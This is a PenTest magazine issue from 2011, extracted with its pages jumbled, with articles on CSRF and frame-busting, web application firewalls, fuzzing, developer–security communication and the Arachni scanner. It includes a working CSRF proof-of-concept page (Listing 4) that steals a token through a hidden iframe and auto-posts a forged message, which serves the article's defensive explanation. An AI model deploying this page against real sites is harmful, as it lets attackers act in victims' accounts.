Best Practices
And the best example of a FrameKiller is the following:

<style> html { display: none; } </style>
<script>
if (self == top) {
    document.documentElement.style.display = 'block';
} else {
    top.location = self.location;
}
</script>
This protects the web application even if an attacker browses the web page with JavaScript disabled in the browser.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvelgevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company, and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006, then seriously began learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience contributed to Samvel's work ethic, for he started to pay attention to each line of code, for good optimization and protection from different kinds of malicious attacks such as XSS (Cross-Site Scripting), SQL Injection, CSRF (Cross-Site Request Forgery), etc. Thus Samvel has taken his job to a higher level, and he is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29, http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. Real scenario of the attack

<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
  var token = window.frames[0].document.forms['messageForm'].elements['token'].value;
  var myForm = document.myForm;
  myForm.token.value = token;
  myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com" />
<input type="hidden" name="token" value="" />
<input type="submit" value="Post" />
</form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
Web applications are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.

In most commercial and non-commercial areas, the
internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private and our working lives. In order to facilitate all of these processes, a broad range of applications is required, provided more or less publicly. Their range extends from simple applications for searching for product information or forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.
A major reason for these rapid developments is the almost unlimited possibility to simplify and accelerate business processes and make them more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of – and more powerful – applications that provide the internet user with the required functions as fast and simply as possible.
Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly as possible, simply and in a variety of ways. So guidelines for safe programming and release processes are usually not available, or they are not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without developers having checked the security status of the web applications sufficiently.
Above all, the common practice of adapting tried and tested technologies for developing web applications without having subjected them to prior security and qualification tests is dangerous. In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications

Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security is, however, often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone worldwide.
professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how extensive their respective knowledge was.
The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element and has actually become a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. The attackers gain access to the browser via infected web applications, and as such to further systems and to their owners' or users' sensitive data.
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data. This is completely wrong; the opposite is the case. One single unsecured web application endangers the security of the systems behind it, such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who bear the big responsibility here towards all those who use their applications – one which they often do not fulfill.
they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.
As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements on service providers who conduct security checks on business-critical systems with penetration tests should then also be correspondingly higher.
While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field: they now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes legitimate use easier, it also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and anonymous action. As a result, the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.
Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies. In the first years of web usage in particular,
Figure 1. This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of a new technology and the securing of that technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire

The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios through which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now the major types have been:
• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross-Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
The only more recent trend: attackers have started to combine these methods more often in order to obtain even higher success rates. And it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.
One Example

Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that smaller companies rarely patch its weak points. They launch automated attacks in order to identify – with high efficiency – as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications that give away information freely. The attackers then only have to evaluate this information, giving them an extensive basis for later targeted attacks.
How to Make a Web Application Secure

There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would have to raise the security of older web applications to the required standards later.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. One example: a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked. It is then not sufficient to just add new functions; the developers must start by precisely analyzing the program and then make deep inroads into its basic structures. This is not only tedious but also harbors the danger of making mistakes. Another example is programs that rely on nothing more than the session attributes for authentication. In such cases it is not straightforward to update the session ID after logging in, which makes the application susceptible to Session Fixation.
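The session-fixation fix alluded to here, rotating the session identifier at login, can be sketched with a hypothetical in-memory session store (the store and function names are illustrative):

```python
import secrets

# Hypothetical in-memory session store, keyed by session ID.
sessions = {}

def new_session():
    """Issue an anonymous, pre-authentication session."""
    sid = secrets.token_hex(16)
    sessions[sid] = {'authenticated': False}
    return sid

def login(old_sid, user):
    """Rotate the session ID at login so a pre-login ID fixed
    by an attacker becomes worthless after authentication."""
    data = sessions.pop(old_sid, {})   # invalidate the old ID
    data.update(user=user, authenticated=True)
    new_sid = secrets.token_hex(16)    # issue a fresh, unpredictable ID
    sessions[new_sid] = data
    return new_sid
```

An application that cannot perform this rotation, for example because the session ID is entangled with other state, remains open to fixation even if everything else is correct.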
If existing web applications display weak spots – and the probability is relatively high – then it should be clarified whether it makes business sense to correct them. It should not be forgotten here that other systems are put at risk by an unsecured application. A risk analysis can clarify whether and to what extent the problems must be resolved, or whether further measures should be taken at the same time. Often, however, the original program developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are developed from scratch. No software program ever went into productive operation free of errors or without weak spots; the shortcomings are frequently uncovered only over time. And by this time, correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality and security still has top priority: the more safely a web application is written, the less improvement work and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAFs) and safeguard the operation of web applications.
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast with classic firewalls and Intrusion Detection
Systems (IDS), a WAF checks the communications at the application level. Normally the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory; they actually complement each other. By analogy with air traffic, it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which as the first security layer considerably minimizes the risk of attacks on any weak spots.
After introducing a WAF, it is still advisable to have the security functions checked by penetration testers. This might reveal, for example, that the system can be abused via SQL Injection by entering inverted commas. It would be a costly procedure to correct this error in the web application; if a WAF is deployed as a protective system, it can instead be configured to filter the inverted commas out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis – that would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context too, penetration tests make an important contribution to increasing web application security.
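The point that filtering special characters does not always stop SQL injection can be illustrated with a short sketch (the quote filter and query builder are hypothetical, for illustration only): an injection in a numeric context needs no quote characters at all, so a rule that only strips quotes misses it.

```python
def strip_quotes(value):
    """Naive WAF-style rule: remove single and double quotes."""
    return value.replace("'", "").replace('"', "")

def build_query(user_id):
    # Deliberately vulnerable string concatenation, for illustration only.
    return "SELECT * FROM users WHERE id = " + strip_quotes(user_id)

# A numeric-context payload that contains no quotes survives the filter:
malicious = "1 OR 1=1"
query = build_query(malicious)
```

This is exactly why a WAF rule set needs analysis of the application's parameters rather than a single character filter.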
WAF Functionality

A major advantage of WAFs is that one single system can close the security loopholes for several web applications. If they are run in redundant mode, they can also perform load-balancing functions in order to distribute data traffic better and increase the performance of the web applications. With content-caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, the WAF filters the data flow between the browser and the web application. If an entry pattern emerges here that is defined as invalid, the WAF interrupts the data transfer or reacts in another way predefined in its configuration. If, for example, two parameters have been defined for a monitored entry form, the WAF can block all requests that contain three or more parameters. The length and the contents of parameters can also be checked in this way. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as maximum length, valid characters and the permitted value range.
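These parameter rules can be sketched in a few lines of Python; the form name, limits and character class below are assumed example values, not any specific WAF's syntax:

```python
import re

# Hypothetical per-form rule set mirroring the checks described above:
# expected parameter count, maximum length, permitted character class.
FORM_RULES = {
    'login': {
        'max_params': 2,
        'max_len': 64,
        'pattern': re.compile(r'^[\w@.\-]+$'),
    },
}

def allow_request(form, params):
    rules = FORM_RULES[form]
    if len(params) > rules['max_params']:
        return False   # e.g. a third, unexpected parameter
    return all(
        len(v) <= rules['max_len'] and bool(rules['pattern'].match(v))
        for v in params.values()
    )
```

A request with an extra parameter, an over-long value or a forbidden character is dropped before it ever reaches the application.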
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML code. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully developed rule set for access rates with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks. However, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar. A virus scanner integrated into the WAF checks every file before it is sent to the web application.
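The nested-elements check such an XML firewall performs can be sketched as a simple depth limit; the limit value here is an assumption, and real products make it configurable:

```python
import io
import xml.etree.ElementTree as ET

MAX_DEPTH = 20  # assumed limit

def nesting_ok(xml_text, limit=MAX_DEPTH):
    """Return False if element nesting exceeds the limit,
    rejecting deeply nested XML before it reaches the parser
    of the backend application."""
    depth = 0
    for event, _elem in ET.iterparse(io.StringIO(xml_text),
                                     events=('start', 'end')):
        if event == 'start':
            depth += 1
            if depth > limit:
                return False
        else:
            depth -= 1
    return True
```

Because the check streams through the document, it can abort on the first violation instead of building the whole tree in memory.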
Figure 2. An overview of how a Web Application Firewall works.
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can – to a certain extent – automatically prevent malicious code from reaching the browser if, for example, a web application does not check the original data sufficiently. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning whenever the application changes. As a result, whitelist-only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, on the other hand, offers attackers too many loopholes. Consequently, the ideal solution relies on a combination of both whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard applications like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
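A minimal sketch of that combination, with an illustrative learned whitelist and two blacklist signatures (both lists are assumptions, not real product data):

```python
import re

# Whitelist of URLs and their acceptable parameters, as Learning Mode
# would build it; blacklist of generic attack signatures.
whitelist = {'/order': {'item', 'qty'}}
blacklist = [re.compile(r'(?i)union\s+select'),
             re.compile(r'(?i)<script')]

def check(url, params):
    allowed = whitelist.get(url)
    if allowed is not None and not set(params) <= allowed:
        return 'blocked: unknown parameter'   # whitelist violation
    for value in params.values():
        if any(sig.search(value) for sig in blacklist):
            return 'blocked: signature match'  # blacklist violation
    return 'allowed'
```

URLs covered by the learned profile get the strict whitelist treatment; everything else still passes through the signature checks.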
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that possibly violate the policies but can still be categorized as legitimate, based on an extensive heuristic analysis. At the same time, the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line bridge path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, this mode means that all data is passed on to the web application, including potential attacks – even if the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is deployed in line and uses both of the system's physical ports (WAN and LAN). As a proxy, a WAF has the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. And special functions are only available here: as a Full Reverse Proxy, a WAF provides, for example, Instant SSL, which converts HTTP pages into HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, and as such the rewriting of URLs used in public requests to the web application's hidden URL. This means that the application's actual web address remains cloaked. With Proxy WAFs, SSL is much faster, and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Layer 7 rules (to avert Denial of Service attacks) as well as authentication and authorization. Cloaking, the concealment of one's
Figure 3. A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult.
own IT infrastructure, is the best way to evade the previously mentioned scanning attacks that attackers use to seek out easy prey. Masking outgoing data offers protection against data theft, and cookie security prevents identity theft. But Proxy WAFs must also be configured according to the respective requirements; penetration tests help with the correct configuration.
Demands on Penetration Testers

When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for transmitting and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic pass through a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there simple SSL encryption for the data traffic, even if the application or the server does not support it?
• Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible withdrawal of sensitive data and then stops it.
Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate tests.
Since, by its very nature, a WAF stands on the front line, certain test criteria should be applied to it as well. These include in particular identity and access management. In this context the principle of least privilege applies: users are only awarded those privileges they need for their work or for the use of the web application; all other privileges are blocked. A general integration of the WAF into Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively and are clearly displayed, easy to understand and easy to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface that is identical across several of the manufacturer's products – or, even better, a management center that administrators can use to manage numerous other network and security products alongside the WAF. The administrators can then rely on the familiar settings processes for security clusters. This ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses that the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI

Oliver Wai leads product marketing for Barracuda's line of Web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (Cum Laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of PenTest:

• Web Session Management
• Password management in code
• ETHical Ghosts on SF1
• Preservation, namely in the online gambling industry
• Cyber Security War

Available to download on December 22nd.

If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.
WHAT IS A GOOD FUZZING TOOL?

Fuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software. It is based on sending anomalous (invalid or unexpected) data to the test target – the same method that is used by hackers and security researchers when they look for weaknesses to exploit. There are no false positives: if the anomalous data causes an abnormal reaction, such as a crash in the target software, then you have found a critical security flaw.
In this article we will highlight the most important requirements for a fuzzing tool and also look at the most common mistakes people make with fuzzing.
Documented test cases: When a bug is found, it needs to be documented for your internal developers or for vulnerability management towards third-party developers. When there are billions of test cases, automated documentation is the only possible solution.
Remediation: All found issues must be reproduced in order to fix them. Network recording (PCAP) and automated reproduction packages help you deliver the exact test setup to the developers so that they can start developing a fix for the found issues.
MOST COMMON MISTAKES IN FUZZING

Not maintaining proprietary test scripts: Proprietary test scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported.
Ticking off the fuzzing check-box: If the requirement for testers is to do fuzzing, they almost always choose the quick and dirty solution, which is almost always random fuzzing. Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in the software.
Using hardware test beds: Appliance-based fuzzing tools become outdated really fast, and the speed requirements for the hardware increase each year. Software-based fuzzers are scalable in performance, can easily travel with you wherever testing is needed, and are not locked to a physical test lab.
Unprepared for cloud: A fixed location for fuzz testing makes it hard for people to collaborate and scale the tests. Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud environments.
PROPERTIES OF A GOOD FUZZING TOOL

There is an abundance of fuzzing tools available. How do you distinguish a good fuzzer; what are the qualities that a fuzzing tool should have?
Model-based test suites: Random fuzzing will certainly give you some results, but to really target the areas that are most at risk, the test cases need to be based on actual protocol models. This results in a huge improvement in test coverage and a reduction in test execution time.
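The contrast with random fuzzing can be sketched with a toy, assumed protocol model: a model-based generator walks the fields of the protocol and replaces one field at a time with anomalous values, so every test case is anchored to a real protocol element rather than to random bytes.

```python
# Toy protocol model: (field name, valid value) pairs. Both the model
# and the anomaly list are illustrative assumptions.
MODEL = [('length', '10'), ('command', 'GET'), ('path', '/index.html')]
ANOMALIES = ['', 'A' * 10000, '%n%n%n', '-1', '\x00']

def generate_cases(model=MODEL, anomalies=ANOMALIES):
    """Yield (targeted field, test message) pairs: each field is
    replaced in turn by each anomalous value."""
    for i, (name, _valid) in enumerate(model):
        for bad in anomalies:
            fields = [v for _, v in model]
            fields[i] = bad   # anomaly in exactly one field
            yield (name, ' '.join(fields))

cases = list(generate_cases())
```

Because the generator knows which field each case targets, found crashes map directly back to a protocol element, which also makes the automated documentation discussed above possible.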
Easy to use: Most fuzzers are built for security experts, but in QA you cannot expect that all testers understand what buffer overflows are. A fuzzing tool must come with all the security know-how built in, so that testers only need the domain expertise from the target system to execute tests.
Automated: Creating fuzz test cases manually is a time-consuming and difficult task. A good fuzzer will create test cases automatically. Automation is also critical when integrating fuzzing into regression testing and bug-reporting frameworks.
Test coverage: Better test coverage means more discovered vulnerabilities. Fuzzer coverage must be measurable in two aspects: specification coverage and anomaly coverage.
Scalable: Time is almost always an issue when it comes to testing. The user must also have control over the fuzzing parameters, such as test coverage. In QA you rarely have much time for testing and therefore need to run tests fast. Sometimes you can spend more time on testing and can select other test completion criteria.
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
Application Security members are regarded like the tax man asking for money. Security is sometimes seen as a cost to pay in order to get an application into production. Actually, it is a little of everyone's fault. Since security people and developers usually do not talk the same language, it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve. Let's take a step back for a minute and let me clarify what I mean about language and communication. Consider this scenario: the Marketing department has asked for a brand new web portal that shows new products from the ACME corporation. Marketers usually do not know anything about technology; they just want to hit the market with an aggressive campaign for the new product line. Marketers might ask the developers something like Give us the latest Web 2.0, social-enabled website, or something like that, to impress the customers. Plus, they would like it as soon as possible, and they provide a deadline that the developers must keep. The developers brainstorm the idea, write out some specifications and requirements, start prototyping their ideas and eventually begin coding. They are under pressure to meet the deadline, and management usually presses even more to meet the proposed deadline. Security is slowly pushed aside so that the coding and production can meet the deadline. Most software architecture is not designed with security in mind, and in project Gantt charts there usually are no security checkpoints included for code testing, nor is time allowed for security fixes or remediation.
Developers are pushed to code the application so that they can meet the deadline. Acceptance tests and functionality tests are passed, and the application is almost ready for deployment when someone recalls something about security: Hey, we need to get this on-line, so we need to open up the firewall to allow access to it.
The Application Security group asks for additional information about the application and requests documentation of how the application was built. They do not see it from the developers' point of view of meeting the deadline that management has imposed on them.
On the other side, developers do not see the problem from a security perspective: what risks to the IT infrastructure will potentially be exposed if someone breaks into the new application?
One solution to the problem is to execute a penetration test on the application and look at the results. Then security is happy, since they can test the application, and developers are happy once the penetration test report is complete. Many times a penetration test report contains recommended mitigation steps that impose additional time constraints on the application delivery. Reports usually contain just the symptom: for example, the report might have statements like a SQL injection is possible, not the real root cause: a parameter taken from a config file is not sanitized before utilization. The report does not contain all
Developers are from Venus, Application Security guys are from Mars
We know that Application Security people talk a different language than developers do, whenever we publish a report, make an assessment, or review a software architecture from a security point of view. There is a gap between developers and the Application Security group. The two teams must interact with each other to reach the same goal: building secure code.
WEB APP SECURITY
Page 20 http://pentestmag.com 01/2011 (1) November
but which is the right one to use to ensure secure code development?
.NET has one single monolithic framework, and Microsoft has invested money in security; it seems they did it the right way, but it is not Open Source, so professionals cannot contribute. A generic framework-based solution is not feasible. What about APIs? Developers do know how to use APIs, and having security controls embedded into a single library can save the day when writing source code. That is why OWASP introduced the ESAPI project: to provide a set of APIs that developers can use to embed security controls into their code.
The requested effort is minimal compared to translating an implement a filter policy statement into running code, and you (as a security professional) now speak the same language as the developer. This is a win-win approach: the security team and the application developers are now on the same page, and everyone is happy. There is a third approach, which I will cover in a follow-up article: the BDD approach. BDD is the acronym for Behavior Driven Development, which means that you start by writing test cases (taking examples from the Ruby on Rails world, you write test beds most of the time using rspec and cucumber) modeling how the source code has to behave according to the documentation or requirements specification. Initially, when you execute the test cases against your application, there will probably be failures that need to be corrected. The idea is straightforward: using the WAPT activity, instead of an implement a filtering policy statement, you will produce a set of rspec/cucumber scenarios modeling how the source code must deal with malformed input. Then the development team starts correcting the code until it passes all of the test cases; when testing is complete and all tests pass, it will mean your source code has implemented the filtering policy. How has development changed? A new approach has been created to ensure that the developers implement your remediation statement. Now the developers understand how to handle malformed input, and why it is so important to the Application Security group.
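As a concrete sketch of that workflow (using Ruby's bundled Minitest in place of rspec/cucumber, purely so the example is self-contained; the filter name and its crude stripping rule are hypothetical):

```ruby
require "minitest/autorun"

# Hypothetical filter under test; name and rule are illustrative only.
def sanitize(input)
  input.gsub(%r{</?[^>]*>}, "") # crude tag stripping for the sketch
end

# Each malformed input found during the WAPT becomes a test case the
# developers must make pass: the filtering policy as an executable spec.
class FilteringPolicyTest < Minitest::Test
  def test_script_tags_are_stripped
    assert_equal "alert(1)", sanitize("<script>alert(1)</script>")
  end

  def test_benign_input_is_untouched
    assert_equal "hello world", sanitize("hello world")
  end
end
```

Until the development team corrects the code, these tests fail; when they all pass, the remediation statement has been implemented.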
In the next article we will see how to write some security tests using the BDD approach, in order to help a generic Java developer deal with cross-site scripting vulnerabilities.
of the information necessary to solve the problems at first glance. The developers cannot mitigate all of the issues in time to meet the deadline, so many times bug fixes are prolonged or pushed into the next revision of the software, and in some cases they are never fixed. Another problem arises when the two groups talk to each other at the end of the whole process and use a non-common-ground language that confuses or annoys everyone and pushes the groups further apart.
Communications Breakdown: You Give Me The Report
Penetration test reports are most of the time useless from the developer's point of view, because they do not give specific information to pinpoint where the problem is. This is very ironic, because the developers need to take full advantage of the security report, since most of the remediation is source code fixes.
Security issues found in penetration testing are not for the faint of heart. There can be a lot of high-level security issues, grouped by OWASP Top 10 (most of the time), with some generic remediation steps such as implement an input filtering policy. This information may not mean anything to a source code developer. They want to know the module, class or line where the problem exists, so that they can fix it. Given enough time, developers can eventually determine where the problem exists, but usually they do not have the time to look through all of the code to find every testing error and still have time to get the application into production.
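To illustrate the symptom-versus-root-cause gap with the report example mentioned earlier (a SQL injection caused by an unsanitized parameter), here is a sketch in Ruby; the FakeDB stand-in is invented so the snippet runs without a real database driver:

```ruby
# Minimal stand-in for a database handle, so the sketch is self-contained.
FakeDB = Struct.new(:last_sql, :last_params) do
  def execute(sql, params = [])
    self.last_sql    = sql
    self.last_params = params
  end
end

db   = FakeDB.new
name = "x' OR '1'='1" # attacker-controlled value

# Symptom the report shows ("a SQL injection is possible"):
# interpolation splices the payload into the SQL text itself.
db.execute("SELECT * FROM users WHERE name = '#{name}'")

# Root cause fixed: a placeholder keeps data out of the SQL text,
# which is what the generic remediation step means for the developer.
db.execute("SELECT * FROM users WHERE name = ?", [name])
```

A report that names the module and line where the first pattern occurs lets the developer apply the second pattern immediately.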
Let's Close the Gap
What we need to do is define a common ground where security can be integrated into source code somewhat painlessly. Security should be transparent from the development team's point of view. This can be achieved by:

• Creating a development framework that has security built into it
• Designing an API to be used by the application
Putting security into the framework is the Rails approach. Rails' developers added security facilities inside the framework's helpers, so developers inherit secure input filtering, SQL injection protection and the CSRF protection token. This is a huge step forward in assisting developers with this problem. This methodology works when a programming language contains a secure framework for developing web applications. This is true for the Ruby community (other frameworks like Sinatra have some security facilities as well). In the Java community, there are a lot of non-standardized frameworks available for Java developers,
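The escaping such framework helpers perform can be reduced to a one-liner; the sketch below uses Ruby's standard-library ERB::Util rather than Rails itself, and is only meant to show the idea:

```ruby
require "erb"

# What the framework helper does, reduced to its core: untrusted input
# is HTML-escaped before it reaches the rendered page.
user_input  = %q(<script>alert('xss')</script>)
safe_output = ERB::Util.html_escape(user_input)

puts safe_output # the script tag is rendered inert as &lt;script&gt;...
```

Because the helper does this transparently, the developer gets the protection without having to think about it, which is exactly the common ground we are after.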
PAOLO PEREGO
Paolo Perego is an application security specialist interested in fixing the code he just broke with a web application penetration test. He's interested in code review, and he's working on his own hybrid analysis tool called aurora. He loves Ruby on Rails, kernel hacking, playing guitar and practising the Tae kwon-do ITF martial art. He's a husband, a daddy and a startup wannabe. You may want to check out Paolo's blog or look at his about me page.
WEB APP VULNERABILITIES
Arachni is not a so-called inspection proxy, such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open Web Application Security Project (OWASP). Those tools are really meant to be used by a skilled consultant doing manual investigations of the application.
Arachni can better be compared with commercial online scanners, which are pointed at the application and produce a report with no further interaction from the user.
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset, and must choose the best combination of tools for the job at hand. Is Arachni worthwhile?

Time for an in-depth review.
Under the Hood
According to the documentation, Arachni offers the following:
• Simplicity: everything is simple and straightforward, from a user's or component developer's point of view
• A stable, efficient and high-performance framework: Arachni allows custom modules, reports and plug-ins. Developers can easily use the advanced framework features without knowing the nitty-gritty details.
Pulling the Legs of Arachni
Arachni is a fire-and-forget (or point-and-shoot) web application vulnerability scanner developed in Ruby by Tasos Zapotek Laskos. It got quite a good score for the detection of Cross-Site Scripting and SQL Injection issues in the recently publicised vulnerability scanner benchmark by Shay Chen.
Table 1: Overview of Audit and Reconnaissance modules included with Arachni
Audit Modules:
• SQL injection
• Blind SQL injection using rDiff analysis
• Blind SQL injection using timing attacks
• CSRF detection
• Code injection (PHP, Ruby, Python, JSP, ASP.NET)
• Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
• LDAP injection
